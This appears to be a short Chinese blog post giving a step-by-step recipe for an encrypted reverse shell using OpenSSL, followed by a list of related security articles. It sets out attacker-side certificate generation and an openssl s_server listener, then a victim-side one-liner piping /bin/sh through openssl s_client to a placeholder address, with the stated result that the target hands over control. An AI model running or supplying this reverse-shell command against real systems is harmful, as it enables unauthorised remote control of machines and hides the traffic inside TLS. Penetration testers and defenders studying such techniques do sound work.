使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
内心如初2 小时前
09_等保系列之等保2.0安全解决方案
网络安全·等保测评·等保测评从0-1·等保测评笔记
介一安全4 小时前
渗透信息收集爬虫工具 Katana 使用指南
爬虫·测试工具·网络安全·安全性测试
clown_YZ4 小时前
KnightCTF2026--WP
网络安全·逆向·ctf·漏洞利用
世界尽头与你5 小时前
CVE-2024-3366_ XXL-JOB 注入漏洞
安全·网络安全·渗透测试·xxl-job
周某人姓周5 小时前
sql报错注入常见7个函数
sql·安全·web安全·网络安全
是逍遥子没错5 小时前
OA渗透测试的思维盲区:从漏洞猎人到系统拆解师
web安全·网络安全·黑客·渗透测试·系统安全·oa系统·src挖掘
大方子6 小时前
【PolarCTF】浮生日记
网络安全·polarctf
世界尽头与你6 小时前
Flask开启Debug模式
后端·网络安全·渗透测试·flask
Whoami!7 小时前
⓫⁄₄ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 搜索Windows的敏感信息
windows·网络安全·信息安全·信息收集
REDcker7 小时前
OpenSSL 完整文档
c++·安全·github·c·openssl·后端开发